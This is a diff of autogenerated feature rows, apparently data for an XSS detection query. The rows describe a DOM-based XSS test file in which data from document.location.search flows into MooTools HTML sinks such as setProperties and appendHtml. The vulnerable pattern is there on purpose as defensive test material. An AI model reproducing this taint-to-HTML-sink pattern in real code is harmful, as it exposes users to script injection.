autogenerated/Xss/DomBasedXss/tst.js:444:14:444:18 | "div" | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:444:14:444:18 | "div" | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:444:14:444:18 | "div" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:444:21:444:33 | setProperties | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:444:21:444:33 | setProperties | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:444:21:444:33 | setProperties | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:444:21:444:33 | setProperties | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:444:21:444:33 | setProperties | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:444:35:444:50 | {"html": source} | CalleeFlexibleAccessPath | Element().setProperties | | autogenerated/Xss/DomBasedXss/tst.js:444:35:444:50 | {"html": source} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:444:35:444:50 | {"html": source} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17685,6 +122842,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:444:35:444:50 | {"html": source} | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | | autogenerated/Xss/DomBasedXss/tst.js:444:35:444:50 | {"html": source} | enclosingFunctionName | mootools | | autogenerated/Xss/DomBasedXss/tst.js:444:35:444:50 | {"html": source} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:41 | "html" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:41 | "html" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:41 | "html" | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:41 | "html" | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:41 | "html" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:49 | "html": source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:49 | "html": source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:49 | "html": source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:49 | "html": source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:49 | "html": source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:49 | "html": source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:49 | "html": source | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:49 | "html": source | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:49 | "html": source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:444:36:444:49 | "html": source | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:444:44:444:49 | source | CalleeFlexibleAccessPath | Element().setProperties | | autogenerated/Xss/DomBasedXss/tst.js:444:44:444:49 | source | InputAccessPathFromCallee | 0.html | | autogenerated/Xss/DomBasedXss/tst.js:444:44:444:49 | source | InputArgumentIndex | 0 | @@ -17694,6 +122866,48 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:444:44:444:49 | source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | | autogenerated/Xss/DomBasedXss/tst.js:444:44:444:49 | source | enclosingFunctionName | mootools | | autogenerated/Xss/DomBasedXss/tst.js:444:44:444:49 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:19 | exceptional return of new Element("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:19 | exceptional return of new Element("div") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:19 | exceptional return of new Element("div") | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:19 | exceptional return of new Element("div") | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:19 | exceptional return of new Element("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:19 | new Element("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:19 | new Element("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:19 | new Element("div") | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:19 | new Element("div") | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:19 | new Element("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:30 | new Ele ... endHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:30 | new Ele ... endHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:30 | new Ele ... endHtml | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:30 | new Ele ... endHtml | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:30 | new Ele ... endHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:38 | exceptional return of new Ele ... source) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:38 | exceptional return of new Ele ... source) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:38 | exceptional return of new Ele ... source) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:38 | exceptional return of new Ele ... source) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:38 | exceptional return of new Ele ... source) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:38 | new Ele ... source) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:38 | new Ele ... source) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:38 | new Ele ... source) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:38 | new Ele ... source) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:445:2:445:38 | new Ele ... source) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:445:6:445:12 | Element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:445:6:445:12 | Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:445:6:445:12 | Element | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:445:6:445:12 | Element | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:445:6:445:12 | Element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:445:14:445:18 | "div" | CalleeFlexibleAccessPath | Element | +| autogenerated/Xss/DomBasedXss/tst.js:445:14:445:18 | "div" | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:445:14:445:18 | "div" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:445:14:445:18 | "div" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:445:14:445:18 | "div" | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:445:14:445:18 | "div" | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:445:14:445:18 | "div" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:445:21:445:30 | appendHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:445:21:445:30 | appendHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:445:21:445:30 | appendHtml | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:445:21:445:30 | appendHtml | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:445:21:445:30 | appendHtml | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:445:32:445:37 | source | CalleeFlexibleAccessPath | Element().appendHtml | | autogenerated/Xss/DomBasedXss/tst.js:445:32:445:37 | source | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:445:32:445:37 | source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17701,12 +122915,150 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:445:32:445:37 | source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | | autogenerated/Xss/DomBasedXss/tst.js:445:32:445:37 | source | enclosingFunctionName | mootools | | autogenerated/Xss/DomBasedXss/tst.js:445:32:445:37 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:449:7:449:13 | Convert | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:449:7:449:13 | Convert | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:449:7:449:13 | Convert | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:449:7:449:39 | Convert | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:449:7:449:39 | Convert | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:449:7:449:39 | Convert | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:449:7:449:39 | Convert ... -html') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:449:7:449:39 | Convert ... -html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:449:7:449:39 | Convert ... -html') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:449:17:449:23 | require | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:449:17:449:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:449:17:449:23 | require | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:449:17:449:39 | exceptional return of require ... -html') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:449:17:449:39 | exceptional return of require ... -html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:449:17:449:39 | exceptional return of require ... -html') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:449:17:449:39 | require ... -html') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:449:17:449:39 | require ... -html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:449:17:449:39 | require ... -html') | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:449:25:449:38 | 'ansi-to-html' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/DomBasedXss/tst.js:449:25:449:38 | 'ansi-to-html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:449:25:449:38 | 'ansi-to-html' | calleeImports | | | autogenerated/Xss/DomBasedXss/tst.js:449:25:449:38 | 'ansi-to-html' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:449:25:449:38 | 'ansi-to-html' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:449:25:449:38 | 'ansi-to-html' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:450:7:450:16 | ansiToHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:450:7:450:16 | ansiToHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:450:7:450:16 | ansiToHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:450:7:450:16 | ansiToHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:450:7:450:32 | ansiToH ... nvert() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 